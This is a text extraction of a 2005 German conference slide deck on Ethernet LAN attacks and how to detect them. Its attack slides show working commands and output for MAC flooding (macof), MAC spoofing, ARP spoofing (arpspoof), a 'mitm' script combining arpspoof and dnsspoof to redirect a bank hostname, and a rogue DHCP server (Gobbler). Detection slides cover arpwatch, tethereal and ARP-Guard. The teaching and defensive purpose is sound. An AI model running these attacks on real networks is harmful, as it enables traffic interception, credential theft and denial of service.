Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant...
Transcript of Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant...
![Page 1: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/1.jpg)
IT-Symposium 2005
1www.decus.de
05. April 2005
© 2004 Hewlett-Packard Development Company, L.P.The information contained herein is subject to change without notice
Hacking the Ethernet
2B03
Andreas AurandNetwork Consultant NWCC, HP
March 31, 2005 Andreas Aurand, HP Network Competence Center 2
Agenda• Übersicht
• Sniffing
• MAC-Angriffe
• ARP Spoofing
• DNS Spoofing
• DHCP-Angriffe
• Andere LAN-Angriffe
![Page 2: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/2.jpg)
IT-Symposium 2005
2www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 3
Shared Ethernet• Bus-Topologie. Alle Maschinen sind an einem
gemeinsam genutzten Bus angeschlossen.• Die einzelnen physikalischen Kabel sind über Hubs
verbunden, • Leiten jedes empfangene Paket an alle verfügbaren Ports weiter• Jedes System kann den gesamten Datenverkehr sehen
• Shared Ethernet bietet keine Sicherheit
Zielsystem00-00-F8-31-A4-2D
SenderAngreifer
Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.
Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben.
Paket zum Zielsystem 08-00-2B-01-02-03
Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.
March 31, 2005 Andreas Aurand, HP Network Competence Center 4
Switched Ethernet• Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports
weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. • Diese Information ist in MAC-Adresstabelle gespeichert• Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben
• Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Paketeüber alle Ports fluten. • Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk• Switch verhält sich wie ein Hub• Pakete sind für Angreifer sichtbar
Zielsystem00-00-F8-31-A4-2D
Sender08-00-2B-05-67-87
Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.
Paket zum Zielsystem 00-00-F8-31-A4-2D
Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports.
Port 2/17
Port Fa0/24
![Page 3: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/3.jpg)
IT-Symposium 2005
3www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 5
Sniffing
March 31, 2005 Andreas Aurand, HP Network Competence Center 6
Sniffing• Angreifer versucht, in Besitz von sensitiven Daten zu gelangen
• Passwörter, vertrauliche Daten usw.• Schnittstelle ist im Promiscuous Mode
Default GatewayIP: 10.185.208.190 / 21
MAC: 00-00-0C-07-AC-7B
Angreifer (Host attack)
IP: 10.185.208.189 / 21MAC: 00-60-97-80-9D-D6
![Page 4: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/4.jpg)
IT-Symposium 2005
4www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 7
Promiscuous Mode Scanner• Erkennen Schnittstellen, die im Promiscuous Mode laufen
• z.B. proDETECT, Promiscan, anti_sniff oder Cain
March 31, 2005 Andreas Aurand, HP Network Competence Center 8
Cain - MAC Scanner• Host 192.168.28.198 nicht im Promiscuous Mode
• http://www.blackhat.com/html/bh-usa-01/bh-usa-01-speakers.html#Daiji%20Sanai
![Page 5: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/5.jpg)
IT-Symposium 2005
5www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 9
Cain - MAC Scanner• Host 192.168.28.198 im Promiscuous Mode
March 31, 2005 Andreas Aurand, HP Network Competence Center 10
MAC-Angriffe
![Page 6: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/6.jpg)
IT-Symposium 2005
6www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 11
Switched Ethernet• Aufbau der MAC-Adresstabelle
• MAC-Adresse ist in der Tabelle vorhanden
Sender00-00-F8-31-A4-2D
Zielsystem08-00-2B-05-67-87
Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.
Port 2/17
Port Fa0/24
Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein.
Zielsystem00-00-F8-31-A4-2D
Sender08-00-2B-05-67-87
Paket zum Zielsystem 00-00-F8-31-A4-2D
Port 2/17
Port Fa0/24
Switch filtert Paket.
Switch filtert Paket.
# show mac-address-table address 0000.F831.A42DNon-static Address Table:Destination Address Address Type VLAN Destination Port------------------- ------------ ---- ----------------0000.f831.a42d Dynamic 1 FastEthernet0/24
March 31, 2005 Andreas Aurand, HP Network Competence Center 12
MAC Flooding• Angreifer versucht die MAC-Adresstabelle aufzufüllen
• Tools: macof oder pktgen
Angreifer"attack"
Pakete mit unterschiedlichen MAC-QuelladressenPakete mit unterschiedlichen MAC-Quelladressen
2/17
Rechner C
Rechner ACat2924CCat5000
Paket für Rechner CPaket für Rechner C Paket für R
echner CP
aket für Rechner C
Paket für R
echner CP
aket für Rechner C
Rechner B
Paket für Rechner CPaket für Rechner C2/18
Fa0/241/2
linny:~ # macof -i eth1 -n 150000macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3
cat5000> (enable) show cam count dynTotal Matching CAM Entries = 130904
![Page 7: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/7.jpg)
IT-Symposium 2005
7www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 13
MAC Flooding• Überlauf der Forwarding-Tabelle über SNMP auslesen
• .iso.org.dod.internet.mgmt.mib-2.dot1dBridge.dot1dTp.dot1dTpLearnedEntryDiscards
# macof -i eth1 -n 100000 >/dev/null 2>&1 &# snmpget -c public 10.185.208.1 mib-2.17.4.1.0 (mib-2 = 1.3.6.1.2.1)SNMPv2-SMI::mib-2.17.4.1.0 = Counter32: 4427
March 31, 2005 Andreas Aurand, HP Network Competence Center 14
MAC Spoofing• Angreifer verwendet MAC-Adresse eines bekannten Systems
• Angreifer kann Pakete nicht an das Zielsystem weiterleiten• DoS-Angriff oder Rogue Server
attack# macchanger --mac=00:10:7b:36:4e:80 eth0Current MAC: 00:60:97:80:9d:d6 (3com Corporation)Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.)
Default GatewayIP: 192.168.28.10
MAC: 00:10:7b:36:4e:80
Angreifer IP: 192.168.28.196
MAC: 00:60:97:80:9d:d6
Pakete mit Quelladresse: 00:60:97:80:9d:d6Pakete mit Quelladresse: 00:60:97:80:9d:d6
3/13
3/15
HTTP ServerIP: 10.185.208.185
MAC: 00-00-F8-71-2E-B3
3/13
3/15
http://10.185.208.185/http://10.185.208.185/
Angreifer IP: 10.185.208.189
MAC: 00:04:c1:7d:d6:54
Pakete mit Quelladresse: 00-00-F8-71-2E-B3Pakete mit Quelladresse: 00-00-F8-71-2E-B3
![Page 8: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/8.jpg)
IT-Symposium 2005
8www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 15
MAC Spoofing• Forwarding-Tabelle nach MAC-Adresse durchsuchen
• MAC-Adresse in Dezimalwert umwandeln• 00:10:7b:36:4e:80 = 0.16.123.54.78.128
• SNMP dot1TpFdbPort-Variable abfragen• # snmpget 192.168.28.1 mib-2.17.4.3.1.2.0.16.123.54.78.128• SNMPv2-SMI::mib-2.17.4.3.1.2.0.16.123.54.78.128 = INTEGER: 67
• ifIndex für Spanning-Tree-Portnummer suchen• # snmpget 192.168.28.1 mib-2.17.1.4.1.2.67• SNMPv2-SMI::mib-2.17.1.4.1.2.67 = INTEGER: 13
• ifName für ifIndex suchen• snmpget 192.168.28.1 mib-2.31.1.1.1.1.13• IF-MIB::ifName.12 = STRING: 2/3
Spanning-Tree Portnummer
ifIndex-Nummer
Portbezeichnung auf dem Switch
March 31, 2005 Andreas Aurand, HP Network Competence Center 16
Switchport zu MAC-Adresse zuordnen
• cammer (perl-Skript, Teil von MRTG)• http://people.ee.ethz.ch/~oetiker/webtools/mrtg/pub/contrib/cammer
# ./cammer.pl [email protected] [email protected]* Gather VLAN index Table from Switch ARRAY(0x815acdc)* Gather Interface Name Table from Switch ARRAY(0x8171a9c)* Gather Arp Table from Router ARRAY(0x8171b38)* Gather Mac 2 Port and Port 2 Interface table for all VLANS1/1 1 00:90:f2:40:bb:172/10 1 00:10:7b:36:4e:802/11 1 00:60:5c:f4:72:6f 192.168.28.254 nixat2.frs-lab.de2/12 1 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/12 82 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/12 111 aa:00:04:00:6f:fc 192.168.28.30 c2610-30.frs-lab.de2/18 1 00:0e:7f:5c:f6:80 192.168.28.52 p2650.frs-lab.de2/18 1 00:0a:57:05:f5:00 192.168.28.51 p5308xl-2.frs-lab.de2/18 111 00:0e:7f:5c:f6:f82/24 1 00:50:54:14:ab:fb2/24 1 00:01:63:55:9b:072/24 1 00:00:f8:71:2a:74 192.168.28.200 cpsp.frs-lab.de2/24 1 00:01:e7:96:a9:00 192.168.28.50 p5308xl-1.frs-lab.de2/24 1 00:50:54:14:ab:ff 192.168.28.2 cat5000-sup2.frs-lab.de2/24 1 00:00:00:00:fe:002/24 1 00:10:7b:3b:5c:a1 192.168.28.20 c2501.frs-lab.de2/24 5 00:01:63:55:9b:072/24 81 00:01:63:55:9b:072/24 99 00:01:63:55:9b:072/24 111 00:01:63:55:9b:072/9 1 00:10:7b:7f:b6:c1 192.168.28.13 c2503-13.frs-lab.de
![Page 9: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/9.jpg)
IT-Symposium 2005
9www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 17
Netdisco• Zuordnung einer MAC-Adresse zu einem Switchport
March 31, 2005 Andreas Aurand, HP Network Competence Center 18
Netdisco• Device-Informationen
![Page 10: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/10.jpg)
IT-Symposium 2005
10www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 19
Netdisco• Netzwerk-Topologie
March 31, 2005 Andreas Aurand, HP Network Competence Center 20
ARP-Guard• Meldet automatisch MAC-Spoofing-Angriff
![Page 11: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/11.jpg)
IT-Symposium 2005
11www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 21
ARP-Guard• Informationen über den Angriff
March 31, 2005 Andreas Aurand, HP Network Competence Center 22
ARP-Guard• Lokalisierung des Angriffs
![Page 12: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/12.jpg)
IT-Symposium 2005
12www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 23
ARP-Guard• Übersicht über die verschiedenen Switchports
March 31, 2005 Andreas Aurand, HP Network Competence Center 24
ARP Spoofing
![Page 13: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/13.jpg)
IT-Symposium 2005
13www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 25
Wie funktioniert der ARP Cache ?
Ja
Nein
Ja
Nein
Protokolltypunterstützt ?Protokolltypunterstützt ?
Merge_Flag := FalseMerge_Flag := False
Eintrag fürSenderpaar imARP Cache ?
Eintrag fürSenderpaar imARP Cache ?
Neuen Eintrag im ARP Cache anlegenNeuen Eintrag im
ARP Cache anlegen
IP-Adresse desZielsystems =lokale Adresse
IP-Adresse desZielsystems =lokale Adresse
Eintrag im ARP Cacheerneuern
und Merge_Flag := True
Eintrag im ARP Cacheerneuern
und Merge_Flag := True
Ja
Ja
Nein
Nein
1
2
Operation-Feld aufares_op$REPLY setzen
Operation-Feld aufares_op$REPLY setzen
Handelt es sich um einen
Request ?
Handelt es sich um einen
Request ?
Lokale HW- und Protokolladresse in die Senderfelder eintragen
Lokale HW- und Protokolladresse in die Senderfelder eintragen
Ja
Reply-Paket als Unicast an HW-Adresse des Zielsystems senden
Reply-Paket als Unicast an HW-Adresse des Zielsystems senden
Nein
Merge Flag = False ?
Merge Flag = False ?
Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als „Sender MAC Address“eingetragen ist.
March 31, 2005 Andreas Aurand, HP Network Competence Center 26
ARP Spoofing• Bestehende Einträge im ARP Cache durch „gefälschte“ ARP-
Pakete modifizieren und neue Einträge hinzufügen
• ARP Spoofing oder ARP Cache Poisoning
• Ermöglicht DoS- und MitM-Attacken
• Gratuitous ARP• ARP Reply Broadcast um einen bestehenden Eintrag auf
allen Systemen des LANs abzuändern• Häufig benutzt, um ARP-Eintrag des Default Gateway
auf allen Hosts eines Subnetzes zu modifizieren
![Page 14: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/14.jpg)
IT-Symposium 2005
14www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 27
arpspoof
attack# arpspoof -i eth0 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ffAddress Resolution Protocol (reply)
… … …Opcode: reply (0x0002)Sender MAC address: 00:60:5c:f4:72:6fSender IP address: 192.168.28.254Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast)Target IP address: 0.0.0.0 (0.0.0.0)
attack# arpspoof -i eth0 -t 192.168.28.197 192.168.28.254Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3Address Resolution Protocol (reply)
… … …Opcode: reply (0x0002)Sender MAC address: 00:60:97:80:9d:d6Sender IP address: 192.168.28.254)Target MAC address: 00:00:f8:71:2e:b3 Target IP address: 192.168.28.197
# arp -a 192.168.28.254192.168.28.254 at 00:60:97:80:9D:D6
AngegriffeneRechner
Default GatewayIP: 192.168.28.254
MAC: 00-60-5c-f4-72-6f
Angreifer (Host attack)
IP: 192.168.28.196MAC: 00-60-97-80-9D-D6
Angriff über ARP Request oder ReplyAngriff über ARP Request oder Reply
Gratuitous ARP wird als Broadcast gesendet.
March 31, 2005 Andreas Aurand, HP Network Competence Center 28
arpwatch• ARPwatch erkennt Änderungen in der Zuordnung
zwischen IP- und MAC-Adresse# arpwatch -dN -i eth1 -f /usr/local/var/log/arp.datFrom: arpwatch (Arpwatch)To: rootSubject: changed ethernet address (router.frs-lab.de)
hostname: router.frs-lab.deip address: 192.168.28.254
ethernet address: 0:60:97:80:9d:d6ethernet vendor: 3COM CORPORATION
old ethernet address: 0:60:5c:f4:72:6fold ethernet vendor: CISCO SYSTEMS, INC.
timestamp: Sunday, February 6, 2005 13:16:55 +0100previous timestamp: Sunday, February 6, 2005 13:15:43 +0100
delta: 1 minute
Nach dieser Adresse in der Forwarding-Tabelle suchen.
![Page 15: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/15.jpg)
IT-Symposium 2005
15www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 29
arpwatch# cat /usr/local/var/log/arp.dat0:60:5c:f4:72:6f 192.168.28.254 1107692483 router0:60:97:80:9d:d6 192.168.28.254 1107692480 router0:0:f8:71:2a:74 192.168.28.200 1107692443 cpsp0:0:f8:71:2e:b3 192.168.28.197 1107692449 unix0:60:97:80:9d:d6 192.168.28.196 1107692449 linny0:0:f8:70:7c:86 192.168.28.199 1107692115 pc
March 31, 2005 Andreas Aurand, HP Network Competence Center 30
tethereal• Statistik für ARP-Pakete mit tethereal erzeugen
• Anzeige der MAC-Adressen bei Summary-Ausgabe
• Script für periodische Statistik
# more ~/.ethereal/preferences... … ...column.format: "Time", "%Yt","MAC Source", "%uhs",
"MAC Destination", "%uhd","Source", "%s", "Destination","%d", "Protocol", "%p", "Info", "%i"
# cat arpstat#!/bin/bashwhile true;
dotethereal -a duration:60 -qz conv,eth -i eth1 arp;date;
done;
![Page 16: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/16.jpg)
IT-Symposium 2005
16www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 31
# arpstatCapturing on eth144 packets captured================================================================================
| <- | | -> | | Total || Frames Bytes | | Frames Bytes | | Frames Bytes |
00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff 0 0 30 1800 30 180000:00:f8:71:2a:74 <-> 00:00:f8:71:2e:b3 2 120 2 120 4 24000:00:f8:71:2e:b3 <-> 00:60:97:80:9d:d6 2 120 2 120 4 240================================================================================Fri Feb 4 15:28:19 MET 2005--------------------------------------------------------------------------------Capturing on eth149 packets captured================================================================================
| <- | | -> | | Total || Frames Bytes | | Frames Bytes | | Frames Bytes |
00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff 0 0 32 1920 32 192000:00:f8:71:2a:74 <-> 00:90:f2:40:bb:00 1 64 1 60 2 12400:00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff 0 0 1 60 1 60================================================================================Fri Feb 4 15:29:22 MET 2005--------------------------------------------------------------------------------
tethereal• Erkennen von Gratuitous ARP
March 31, 2005 Andreas Aurand, HP Network Competence Center 32
• Erkennen von "normalem" ARP Spoofing
• Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen.
# arpstatCapturing on eth142 packets captured================================================================================
| <- | | -> | | Total || Frames Bytes | | Frames Bytes | | Frames Bytes |
00:60:97:80:9d:d6 <-> 00:00:f8:71:2e:b3 0 0 31 1860 31 186000:00:f8:71:2e:b3 <-> 00:60:97:80:9d:d6 2 120 2 120 4 24000:00:f8:71:2a:74 <-> 00:60:5c:f4:72:6f 1 60 1 60 2 12000:00:f8:71:2a:74 <-> 00:10:7b:7f:b6:60 0 0 2 120 2 12000:10:7b:7f:b6:60 <-> ff:ff:ff:ff:ff:ff 0 0 2 120 2 12000:00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff 0 0 1 60 1 60================================================================================Fri Feb 4 15:33:33 MET 2005--------------------------------------------------------------------------------
tethereal
![Page 17: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/17.jpg)
IT-Symposium 2005
17www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 33
ARP-Guard• Meldet automatisch ARP-Spoofing-Angriff
March 31, 2005 Andreas Aurand, HP Network Competence Center 34
ARP-Guard• Informationen über den Angriff
![Page 18: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/18.jpg)
IT-Symposium 2005
18www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 35
ARP-Guard• Lokalisierung des Angriffs
March 31, 2005 Andreas Aurand, HP Network Competence Center 36
DNS Spoofing
![Page 19: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/19.jpg)
IT-Symposium 2005
19www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 37
DNS Spoofing• Oft für Man-in-the-Middle-Attacken benutzt
• Verschlüsselte Verbindungen terminieren angreifendem Rechner• SSH• HTTPS
• Angreifer beantwortet DNS Query mit eigenem DNS Response• Reply-Adresse ist seine eigene IP-Adresse
• Angreifer muss DNS Queries empfangen können• ARP Spoofing
• MAC Flooding
March 31, 2005 Andreas Aurand, HP Network Competence Center 38
DNS SpoofingServer
(Host www.bank.de)10.185.208.186
Angegriffener RechnerIP: 10.205.210.127 / 21
MAC: AA-00-04-00-37-FD
Angreifer (Host attack)
IP: 10.205.208.189 / 21MAC: 00-60-97-80-9D-D6 DNS Response (Host: www.bank.de, IP: 10.185.208.186)DNS Response (Host: www.bank.de, IP: 10.185.208.186)
DNS Queries gehen immer zuerst zum Angreifer.
Session zwischen dem Angreifer und dem eigentlichen Server
DNS Query (Host: www.bank.de)DNS Query (Host: www.bank.de)
Die DNS Response des Angreifers enthält seine IP-Adresse.
Default GatewayIP: 10.205.208.1 / 21
MAC: 00-00-F8-71-2E-B3
DNS Server 10.34.93.242
![Page 20: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/20.jpg)
IT-Symposium 2005
20www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 39
SSHv1 MitM-Attacke Fingerabdruck des öffentlichen Server Keys
38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b [email protected] des öffentlichen Server Keys
38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b [email protected]
Angegriffener Rechner(Host pcdepp)
IP: 10.205.210.127
Angreifer (Host attack)
IP: 10.205.208.189
SSH Server (Host www.bank.de)
10.185.208.186
SSH Session zwischen dem Client und dem Angreifer.
SSH Session zwischen dem Angreifer und dem eigentlichen Server.
DNS Server 10.34.93.242
Default GatewayIP: 10.205.208.1 / 21
March 31, 2005 Andreas Aurand, HP Network Competence Center 40
dnsspoof (dsniff-Tool)• Script für DNS Spoofing
attack# cat mitm## Enable Forwarding and disable sending ICMP Redirects#echo "1" > /proc/sys/net/ipv4/ip_forwardecho "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects## Enable ARP and DNS Spoofing#arpspoof -i eth0 10.205.208.1 2>/dev/null &dnsspoof -i eth0 -f dnsspoof.hosts host 10.205.210.127 2>/dev/null &
# cat dnsspoof.hosts10.205.208.189 www.bank.de
IP-Adresse des Default Gateway
IP-Adresse des angegriffenen Rechners
IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für www.bank.de zurückgesendet wird.
![Page 21: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/21.jpg)
IT-Symposium 2005
21www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 41
tethereal• Erkennen von DNS Spoofing durch tethereal
• Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen.
# tethereal -lni eth1 not ether src 00:00:f8:71:2e:b3 and udp src port 53Capturing on eth12005-02-04 11:02:18.762435 00:60:97:80:9d:d6 -> aa:00:04:00:37:fd 10.34.93.242 -> 10.205.210.127DNS Standard query response A 10.205.208.189
2005-02-04 11:02:18.762803 00:60:97:80:9d:d6 -> aa:00:04:00:37:fd 10.34.93.242 -> 10.205.210.127DNS Standard query response A 10.205.208.189
March 31, 2005 Andreas Aurand, HP Network Competence Center 42
DHCP-Angriffe
![Page 22: Hacking the Ethernet - decus.de · Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP March 31, 2005 Andreas Aurand, HP Network Competence Center 2 Agenda • Übersicht](https://reader033.fdocuments.us/reader033/viewer/2022060605/605a58aaf953ea662375ad4f/html5/thumbnails/22.jpg)
IT-Symposium 2005
22www.decus.de
05. April 2005
March 31, 2005 Andreas Aurand, HP Network Competence Center 43
DHCP Rogue Server• Angreifer setzt eigenen DHCP-Server ab um Clients mit
falschen Informationen zu versorgen. • Ermöglicht DoS- als auch MitM-Attacken• Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht
Default Gateway192.168.1.1 Angegriffener
DHCP Client
NormalerDHCP Server 192.168.1.2
DHCP Offer mit 192.168.1.185 als Default Gateway
DHCP Offer mit 192.168.1.185 als Default Gateway
Alle vom Client gesendeten Pakete gehen über den Angreifer.
Rückverkehr geht vom Default Gateway direkt zum Client.
AngreifenderRogue Server 192.168.1.185
March 31, 2005 Andreas Aurand, HP Network Competence Center 44
attack# ./Gobbler -m 1 -D 192.168.1.185 -G 192.168.1.185 -A 192.168.1.33DHCP gobbler v0.66 from www.networkpenetration.com--------------------------------------------------Man the middle attackTrying to gobble address to be used in man in the middle attackDHCP Discover packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP OFFER packetDHCP request packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....Got a DHCP ACK packet192.168.1.113 gobbled.... Total: 1Address(es) to be spoofed 192.168.1.113Sniffing for discover messagesSniffing DHCP packets.....Got A DHCP discover packet..... a host is trying to find a valid IPTime to do the dirty workDHCP Offer packet constructed and injected, wrote all 342 bytesSniffing DHCP packets.....got a dhcp request packetTransaction compare passed...Request IP: 192.168.1.113Offerd IP: 192.168.1.113Sent + Requested IP's match.... sending ackCreating an Ack packetDHCP ACK packet constructed and injected, wrote all 342 bytesMan in the middle should be established m00 m4m4m4m4Just checking incase of other servers weren't happy (waiting for 10 seconds)
Sniffing DHCP packets.....
DHCP Gobbler
Rogue Server allokiert eine Adresse vom richtigen DHCP-Server.
Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück.
